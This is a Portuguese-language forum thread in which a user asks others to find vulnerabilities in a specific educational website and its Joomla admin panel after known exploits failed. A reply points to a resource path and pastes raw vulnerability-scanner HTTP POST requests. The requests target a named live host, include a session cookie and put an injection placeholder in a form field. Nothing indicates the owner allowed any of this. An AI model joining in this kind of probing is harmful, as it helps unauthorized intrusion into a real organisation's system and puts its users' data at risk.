Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Ajuda] testar vulnerabilidade Webgiz

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    [Ajuda] testar vulnerabilidade Webgiz

    o site tem um sistema de ensino novo que ultiliza joomla, ja tentei os exploits mas acho que a versão dele é nova..


    site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    painel adm joomla: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    agradeço se conseguirem me mostrar alguma vulnerabilidade, ja que nao acho

  • Font Size
    #2
    /webgiz/WebResource.axd

    Eu acho que é isso, não tenho certeza :s

    Fiz um scan e consta que tem alguma vulnerability de oracle.
    Porque estudar a criação se eu posso estudar a invasão?

    Comment


    • Font Size
      #3
      desculpa o double post aí, é que não sei como editar o post aqui :s

      continuando o scan amigo:

      POST /webgiz/index.php HTTP/1.1
      Content-Length: 66
      Content-Type: application/x-www-form-urlencoded
      Cookie: d4dad6935f632ac35975e3001dc7bbe8=efe8c99bd5d5c6d4c 423c569733257d8; tipoUsuario=D
      Host: pinheiroguimaraes.no-ip.biz:8081
      Connection: Keep-alive
      Accept-Encoding: gzip,deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

      cpf=&datan=01/01/1967&identidade=${inj



      POST /webgiz/index.php HTTP/1.1
      Content-Length: 66
      Content-Type: application/x-www-form-urlencoded
      Cookie: d4dad6935f632ac35975e3001dc7bbe8=efe8c99bd5d5c6d4c 423c569733257d8; tipoUsuario=D
      Host: pinheiroguimaraes.no-ip.biz:8081
      Connection: Keep-alive
      Accept-Encoding: gzip,deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

      cpf=&datan=01/01/1967&identidade=${injecthere}&instituicao=0


      acho que isso ajuda um pouco :s
      Porque estudar a criação se eu posso estudar a invasão?

      Comment

      X
      Working...
      X